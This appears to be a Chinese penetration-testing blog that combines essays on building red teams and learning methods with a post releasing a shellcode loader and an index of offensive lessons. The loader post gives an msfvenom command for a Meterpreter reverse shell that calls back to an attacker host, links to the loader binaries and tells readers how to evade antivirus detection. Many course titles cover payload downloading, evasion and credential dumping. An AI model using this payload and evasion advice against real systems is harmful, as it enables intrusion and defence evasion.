2019年12月26日星期四

论高级攻防团队建设方法论之思想的重要性(上)

注:文章较长,故分为多季来连载,转载请标注来源

前言:

本质可能发生转变,它可以由质变到量变,体系可以被打破,随时间的推移,它可以被推倒重塑,唯有思想将永垂不朽。
问题的背后是本质,本质的串联是体系,体系的整合是思想。

文章将会围绕“三个是什么?”来展开,分别是
1:问题的背后是什么?(上)
2:本质的背后是什么?
3:问题的背后是什么?

引言:创业公司的老板或者整体团队负责人都有一个特点,
如果这个人是销售出身:注重与人打交道
如果这个人是技术出身:注重与事打交道

像销售一样去思考,像技术一样去行动。
————Micropoor

一:问题的背后是什么?


1:团队技术模型与招聘管理

        顾名思义,高级攻防团队的建设,表面核心为“攻”,问题的背后是“人才”的管理。如何打造出一支能对抗“有组织,有纪律”的团队?一定是分工合理,责任明确,多个子部门联动的团队。至少一名主管,三名负责人,由于在招聘过程中会涉及到大量的技术模型重合,与人员沉淀,考虑到投入产出比平衡等,故其中负责人(一)主要团队技术模型为:“当下吃饱饭”,(不考虑部门编制,不考虑部门技术人员模型重复以及沉淀,只对部门当下KPI负责,负责面试一面)负责人(二,三)技术模型为:未来更美好(需要考虑到人员技能重合,考虑部门技术闭合,项目生命周期技能模型闭合,考虑人员沉淀等,有权拒绝重复性质人员进入,负责面试二面)。也就是说,每个负责人的责任不同,但方向相一致,一个是当下,一个是未来。主管需要考虑子部门与子部门之间的业务联动,技术闭合,利益共同体,人员的整体学习方法模型,整体方向,战略规划等。部门主管,一定要有放权的勇气,兜底的能力。





2:人员的学习与晋升

古人把一个职业的发展分为7个阶段:

奴:自愿和靠人监督的人
徒:能力不足,肯自愿学习的人
工:老老实实,按规矩做事的人
匠:精通一门技艺或手艺的人
师:掌握了规律,又能将其传授给他人的人
家:有固定的信念,让别人生活的更好的人
圣:精通事理,通达万物的人

同样网络安全学习也有10个阶段划:

问:自愿或靠人监督的人
学:能力不足,肯自愿学习的人
动:老老实实,按课本或教学实践的人
记:记录每次实践或学习心得体会并总结的人
体系:建立适合自己的体系,并能把知识碎片化结合到自我体系的人
问:体系建立后,重新归纳更新知识,并体系重新结构化的人
分享:掌握了规律,又能将其传授给他人的人
带团队:有固定的信念,带领团队或集体形成合力的人
授业:可以传授道理、教授学业、解答疑难问题,指路人。
育才:培养出比自己优秀和强大的人

以上为人员技术能力晋升阶段,而提升整体人员,又要从主动学习与被动学习,个人学习与团队学习方法建模。
爱德加·戴尔提出了一套学习模型:模型主要分别为被动学习与主动学习的一个过程。
同时提出,学习效果在30%以下的几种传统方式,都是个人学习或被动学习;而学习效果在50%以上的,都是团队学习、主动学习和参与式学习


3:引入

        需要“心流理论”引入团队管理,根据契克森米哈伊的说法,就是个体完全地沉浸于体验本身,而体验本身就是最好的奖赏和动机。在心流状态中,我们的感觉和体验合二为一,即“行为和觉察融为一体”。在心流状态中,享受着巅峰体验,同时也做出了巅峰表现:既感受到了快乐,又展现出最好的状态。运动员把这种情形称为“在状态”。无论在心流的境界里做什么,踢球也好,雕刻也好,写诗也好,学习也好,对于正在进行的事情采取的是一种全神贯注的态度,没有任何人或事可以打扰我们或是使我们分心。在这种最佳状态下,能够更有效地学习、成长、进步并且向未来的目标迈进
       拥有清晰的目标是心流体验的前提。虽然目标有时会有所改变,但部门行进的方向是不能错的。当全心全力投入去实现目标,不为任何其他的诱惑所动摇时,才能获得心流体验。同时,当下以及未来的益处在这种状态下合二为一:遥远的目标不但不是阻力,反而可以帮助感受正在经历的意义。心流体验所带来的是更高层次的幸福,它把“一分耕耘,一分收获”变成了“现在的快乐即未来的成果”。“一分耕耘,一分收获”的说法代表我们必须承受极度的压力,无论是身体上还是心理上的,才能发挥100%的潜力,实现至高的目标;但在心流体验中,痛苦本身并不是巅峰表现的最高境界;相反,有一个区域是在过难和过易之间,在这个区间内,不但可以发挥出最大的潜力,还可以享受过程中的快乐。如果想要达到这个境界,任务的挑战要难易适度。


      如果任务难度大而技能不足时,会感到焦虑;相反,如果技能高超而任务太简单时,就会感到乏味。只有当难度和技能匹配时,心流体验才有可能出现。有两种不同的情况会影响拥有心流体验:一是有压力的环境,因为这样会带来焦虑;二是没有挑战性的环境,因为这样会使人觉得无聊、厌倦。
好的部门可以营造出一个传播幸福的工作环境。一些外在条件可以帮助员工在工作中找到更多的意义:第一,这份工作必须能够激发员工的才华和潜力;第二,雇员应该获得更大的发挥空间,在部门的运作中扮演更重要的角色,而不只是旁观者;第三,雇员应该感受到他们的业绩是有意义的。

一旦事物的本质抓住,那么就可以降维打击,以渗透的本质为例:

目标资产信息搜集的程度,决定渗透过程的复杂程度。
目标主机信息搜集的深度,决定后渗透权限持续把控。
渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。

以上是第一小节”论本质“的重要性,理论与实战结合参考:
渗透的本质是信息搜集                                                                                                                                                                                                                                                                                                                         

小结:问题的背后是本质技术团队不仅仅是由技术主导,而这背后隐藏了资源分配,资源倾斜,学习气氛,沟通,协同,人员能力晋升,团队技术模型与闭合等一系列问题。透过问题看本质。本质适用于”独狼“行动,可快速提高个人实战能力以及思想,但它并不适合”狼群“作战,也就是说团队协作并不适合"本质"方法论。




2019年8月22日星期四

网络安全学习方法论之体系的重要性

如果你分享的内容过于真实,你就没有发表机会,你要完全假了呢,又没有读者去看,你可以在这个通道里,真一会儿假一会儿地往前走,最重要的还是要往前走。

——Micropoor

古人半部论语治天下,读书考功只须熟读四书,而四书加起来不过区区5万字。可见网络安全学习知识体系的建立是重中之重。

古人将一个职业划分为7个阶段,既:


  • 奴:自愿和靠人监督的人
  • 徒:能力不足,肯自愿学习的人
  • 工:老老实实,按规矩做事的人
  • 匠:精通一门技艺或手艺的人
  • 师:掌握了规律,又能将其传授给他人的人
  • 家:有固定的信念,让别人生活的更好的人
  • 圣:精通事理,通达万物的人


同样网络安全学习也有10个阶段划,既:


  • 问:自愿或靠人监督的人
  • 学:能力不足,肯自愿学习的人
  • 动:老老实实,按课本或教学实践的人
  • 记:记录每次实践或学习心得体会并总结的人
  • 体系:建立适合自己的体系,并能把知识碎片化结合到自我体系的人
  • 问:体系建立后,重新归纳更新知识,并体系重新结构化的人
  • 分享:掌握了规律,又能将其传授给他人的人
  • 带团队:有固定的信念,带领团队或集体形成合力的人
  • 授业:可以传授道理、教授学业、解答疑难问题,指路人。
  • 育才:培养出比自己优秀和强大的人

只有体系化的知识结构才能教导你思考问题、引导你洞察趋势、指导你展开行动。


什么是体系?

  • 体系的本质是碎片化知识点的灵活串联与应用
  • 知识体系是基于人而存在的,世上不存在不同的人完全相同的知识体系

什么是知识体系?

  • 在我的定义中,知识体系是跟碎片知识相对应的概念,指高度有序的知识集合。也就是说,它由两部分组成:一是大量的知识点,二是有序的结构。



建立体系的过程?


  • 整理知识碎片化
  • 建立知识框架
  • 形成知识体系
  • 碎片化知识点纳入体系中

王国维在《人间词话》中说,古今之成大事业、大学问者,必经过三种之境界:


  • 昨夜西风凋碧树,独立高楼,望尽天涯路
  • 衣带渐宽终不悔,为伊消得人憔悴
  • 众里寻他千百度,蓦然回首,那人却在灯火阑处

爱德加·戴尔提出了一套学习模型:模型主要分别为被动学习主动学习的一个过程。
同时提出,学习效果在30%以下的几种传统方式,都是个人学习或被动学习;而学习效果在50%以上的,都是团队学习、主动学习和参与式学习。

“输出”是最好的学习方式,“输出”的本质是体系重新结构化








这里总结了如下经常碰到的问题,值得每一位网络安全从业人员深思:

  • 不知道怎么学?
  • 不知道学哪个方向?
  • 越学越不会?
  • 感觉自己跟不上知识更新的速度?
  • 从事网安工作若干年后,感觉遇到技术瓶颈,怎么突破?
  • 工具/技术招式越来越多,怎么办?
  • 从事管理工作后,没有时间或者精力学习技术怎么办?

方法论结合于实战应用,请参考之前的文章如下:





结语:
在每次分享的同时,深深发现,原来分享,才是我最好的老师。
网络安全亦正亦邪,初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田美池桑竹之属。别在初极狭便放弃这“人间正道”,错过这“土地平旷,屋舍俨然,有良田美池桑竹之属。”,愿每一位读者能找到自己能融合贯通的“武功”,在结合吞噬其他“招式”,如行云流水,石便是器,枝便是剑。

2019年1月21日星期一

Micropoor_shellcode for payload backdoor


Micropoor_shellcode:

Usage:

Micropoor_shellcode  port host

E.g

Micropoor_shellcode.exe 4444 192.168.1.5

Generate payload:

msfvenom  -p windows/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=53 -b '\x00' -f c |grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"

copy shellcode to Micropoor_box.rb








Micropoor_shellcode_x64.exe:
大小: 136192 字节
修改时间: 2019122, 4:40:59
MD5: 304F3C23AD6C57714EDB73D93DA6813D
SHA1: 63B213272AADA91A44F965741E3720EE25CAF7C9
CRC32: 4C2FDE0A
https://drive.google.com/open?id=14HapmSXQtb-HpnXeO3MUEf2utwKfkhOa

Micropoor_shellcode_x86.exe:
大小: 117248 字节
修改时间: 2019122, 2:45:50
MD5: D91444F0A632DEE7F57BAE432CEFFAEC
SHA1: 3D5135FE30FBEFD090B6BBB1F7738DB25B0C2CCC
CRC32: 02BE2833
https://drive.google.com/open?id=15GqGl5KgfVpEkCBItrmqddpDxmXzFG6m

Micropoor_shellcode.rb
大小: 956 字节
修改时间: 2019122, 3:13:17
MD5: 9A82AB2C3A39CABC26FC68864DB07BA1
SHA1: 92D6253C88BA10073CD3AAEE8C38C366DFC7761F
CRC32: 97FA3861
https://drive.google.com/open?id=17uv2Mszu4et3Co1HWQ50mMZiPCL7Ku9F

目前搜集问题总结:

问题1:程序崩溃:
           shellcode分离加载器分为x86,x64,版本。请对应相关的Micropoor_shellcode.exe。
这里需注意,msfvenom的payload其中windows/messagebox,是分x64与x86的,只是msfvenom本身仅提供了x86版本的shellcode。所以如果需运行messagebox,需要调用Micropoor_shellcode_x86.exe。
           程序崩溃2:
           如果生成x86或者x64的shellcode,那么msf本身请对应相关位数的payload。

问题2:被查杀:
           了解用法后,请去掉Micropoor的字符串字样,或者更改其他字符串即可。
         




2019年1月4日星期五

PHP安全新闻早8点课程系列

     文中一定会出现笔误或者不对的地方,请大家多多包涵,提前向各位说声对不起,所有课程从基础开始(包括工具的介绍,应用等),这样以后新来的同事或者想要自我从头学习的同事也可以避开一些弯路,在写的过程中,我深深体会到分享者才是学习中的最大受益者,由于需要成文章,所以需要查阅大量的资料。在整个过程中,又学习到很多知识点。连载其中包括穿插在工作中的项目心得笔记,包括但不限制于代码审计,web渗透,内网渗透,域渗透,隧道介绍,日志溯源与暴力溯源等。如果有课程指定需求介绍相关技术的同事(在我技术能力范围之内),请发我的邮箱:micropoor@gmail.com
     在2010-2012年之间一直在写<PHP安全新闻早8点>,但是由于当时的工作原因,就不在写了。这次的所有课程无版权,只希望自己可以在本来已封闭的技术氛围里,依然做出一些技术文档输出。那么这次的教程我想依然想叫<PHP安全新闻早8点>,笔者相信有一天,你会发现原来弄清事物的本质是这样的有趣。






2017-11-17
Micropoor

动态:
          更新第十八课内容以及链接,2019-1-21
          暂停更新,文章核心全部围绕企业安全防御,预警为出发点。2019-1-25
          更新第二十一课至第二十六课内容以及链接,2019-2-4
          如有指定技术需求,请在系列中留言,会在未来课时中更新该相关技术文章。2019-2-18
          更新完毕第一章:生(100课时),点我下载。2019-2-18





第一章:


1-10课:
第一课:windows提权-快速查找exp
第二课:Linux提权-依赖exp篇
第三课:Delphi代码审计--项目实战1
第四课:Asp代码审计--项目实战2
第五课:工具介绍-Sqlmap
第六课:反攻的一次溯源--项目实战3
第七课:sql server 常用操作远程桌面语句
第八课:模拟诉求任务攻击
第九课:工具介绍-the-backdoor-factory
第十课:msfvenom常用生成payload命令

11-20课:
第十一课:工具介绍Veil-Evasion
第十二课:基于UDP发现内网存活主机
第十三课:基于ARP发现内网存活主机
第十四课:基于第十课补充payload1
第十五课:基于第十课补充payload2
第十六课:红蓝对抗渗透测试1
第十七课:红蓝对抗渗透测试2
第十八课:红蓝对抗渗透测试3
第十九课:基于netbios发现内网存活主机
第二十课:基于snmp发现内网存活主机

21-30课:
第二十一课:基于ICMP发现内网存活主机
第二十二课:基于SMB发现内网存活主机
第二十三课:基于MSF发现内网存活主机第一季
第二十四课:基于MSF发现内网存活主机第二季
第二十五课:基于MSF发现内网存活主机第三季
第二十六课:基于MSF发现内网存活主机第四季
第二十七课:基于MSF发现内网存活主机第五季
第二十八课:基于MSF发现内网存活主机第六季
第二十九课:发现目标WEB程序敏感目录第一季
第三十课:解决msfvenom命令自动补全

31-40课:
第三十一课:msf的前生今世
第三十二课:配置vps上的msf
第三十三课:攻击Mysql服务
第三十四课:攻击Sql server 服务
第三十五课:与Sqlmap结合攻击
第三十六课:解决vps上ssh掉线
第三十七课:vbs一句话下载payload
第三十八课:certutil一句话下载payload
第三十九课:vbs一句话下载payload补充
第四十课:ftp一句话下载payload

41-50课:
第四十一课:bitsadmin一句话下载payload
第四十二课:攻击FTP 服务
第四十三课:js一句话下载payload
第四十四课:certutil一句话下载payload补充
第四十五课:解决bat一句话下载payload黑窗
第四十六课:powershell一句话下载payload
第四十七课:payload分离免杀思路
第四十八课:payload分离免杀思路第二季
第四十九课:关于Powershell对抗安全软件
第五十课:基于SqlDataSourceEnumerator发现内网存活主机

51-60课:
第五十一课:项目回忆:体系的本质是知识点串联
第五十二课:渗透的本质是信息搜集
第五十三课:内网渗透中的文件传输
第五十四课:基于Powershell做Socks 4-5代理
第五十五课:与Smbmap结合攻击
第五十六课:离线提取目标机hash
第五十七课:高级持续渗透-第一季关于后门
第五十八课:高级持续渗透-第二季关于后门补充一
第五十九课:高级持续渗透-第三季关于后门补充二
第六十课:高级持续渗透-第四季关于后门

61-70课:
第六十一课:高级持续渗透-第五季关于后门
第六十二课:高级持续渗透-第六季关于后门
第六十三课:高级持续渗透-第七季demo的成长
第六十四课:高级持续渗透-第八季demo便是远控
第六十五课:离线提取目标机hash补充
第六十六课:借助aspx对payload进行分离免杀
第六十七课:meterpreter下的irb操作第一季
第六十八课:基于Ruby内存加载shellcode第一季
第六十九课:渗透,持续渗透,后渗透的本质
第七十课:ftp一句话下载payload补充

71-80课:
第七十一课:基于白名单Msbuild.exe执行payload第一季
第七十二课:基于白名单Installutil.exe执行payload第二季
第七十三课:基于白名单Regasm.exe执行payload第三季
第七十四课:基于白名单Regsvcs.exe执行payload第四季
第七十五课:基于白名单Mshta.exe执行payload第五季
第七十六课:基于白名单Compiler.exe执行payload第六季
第七十七课:基于白名单Csc.exe执行payload第七季
第七十八课:基于白名单Msiexec执行payload第八季
第七十九课:基于白名单Regsvr32执行payload第九季
第八十课:基于白名单Wmic执行payload第十季

81-90课:
第八十一课:基于白名单Rundll32.exe执行payload第十一季
第八十二课:基于白名单Odbcconf执行payload第十二季
第八十三课:基于白名单PsExec执行payload第十三季
第八十四课:基于白名单Forfiles执行payload第十四季
第八十五课:基于白名单Pcalua执行payload第十五季
第八十六课:基于白名单Msiexec执行payload第八季补充
第八十七课:基于白名单Cmstp.exe执行payload第十六季
第八十八课:基于白名单Ftp.exe执行payload第十九季
第八十九课:基于白名单Url.dll执行payload第十七季
第九十课:基于白名单zipfldr.dll执行payload第十八季

91-100课:
第九十一课:从目标文件中做信息搜集第一季
第九十二课:实战中的Payload应用
第九十三课:与CrackMapExec结合攻击
第九十四课:基于实战中的small payload
第九十五课:基于portfwd端口转发
第九十六课:HTTP隧道ABPTTS第一季
第九十七课:MSF配置自定义payload控制目标主机权限
第九十八课:HTTP隧道reGeorg第二季
第九十九课:HTTP隧道Tunna第三季
第一百课:HTTP隧道reDuh第四季


第二章:


101-110课:
第一百零一课:基于SCF做目标内网信息搜集第二季
第一百零二课:对抗权限长期把控-伪造无效签名第一季
第一百零三课:Http加密隧道下的横向渗透尝试---klion
第一百零四课:Windows Smb 欺骗重放攻击利用---klion
第一百零五课:windows 单机免杀抓明文或hash [通过dump lsass进程数据]---klion
第一百零六课:windows 单机免杀抓明文或hash [通过简单混淆编码绕过常规静态检测]---klion
第一百零七课:跨平台横向移动 [ windows计划任务利用 ]---klion
第一百零八课:跨平台横向移动 [wmi利用]---klion
第一百零九课:依托 metasploit 尽可能多的发现目标内网下的各类高价值存活主机---klion
第一百一十课:窃取,伪造模拟各种windows访问令牌[token利用]---klion

111-120课:
第一百一十一课:内网mssql完整利用流程 [ 基础篇 ]---klion
第一百一十二课:利用Dropbox中转C2流量---klion
第一百一十三课:COM Hijacking---倾旋
第一百一十四课:渗透沉思录
第一百一十五课:使用CrackMapExec 进行 NTLM Hash传递攻击---倾旋
第一百一十六课:Windows域渗透 - 用户密码枚举---倾旋
第一百一十七课:Windows 本地特权提升技巧---倾旋
第一百一十八课:CVE-2017-11882钓鱼攻击---倾旋

121-130课:
第一百二十一课:http加密代理深度应用 [ abptts ]---klion
第一百二十二课:利用 ssh隧道实现内网断网机meterpreter反向上线---klion
第一百二十三课:利用ssh隧道将公网meterpreter弹至本地的msf中---klion

131-140课:

141-150课:

151-160课:

161-170课:

171-180课:

181-190课:

191-200课:


第三章:


201-210课:

211-220课:

221-230课:

231-240课:

241-250课:

251-260课:

261-270课:

271-280课:

281-290课:

291-300课:


第四章:




高级持续渗透-第八季demo便是远控